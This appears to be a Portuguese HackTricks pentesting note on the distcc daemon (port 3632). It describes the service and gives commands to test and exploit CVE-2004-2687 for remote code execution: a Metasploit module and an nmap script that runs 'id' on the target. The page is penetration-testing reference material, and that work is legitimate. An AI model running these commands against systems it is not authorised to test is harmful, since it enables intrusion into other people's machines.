2.6 KiB
Informação Básica
O Distcc é projetado para acelerar a compilação aproveitando o poder de processamento não utilizado em outros computadores. Uma máquina com o Distcc instalado pode enviar código para ser compilado pela rede para um computador que tenha o daemon Distccd e um compilador compatível instalado.
Porta padrão: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploração
Verifique se é vulnerável ao CVE-2004-2687 para executar código arbitrário:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Shodan
Não acredito que o Shodan detecte este serviço.
Recursos
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post criado por Álex B (@r1p)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.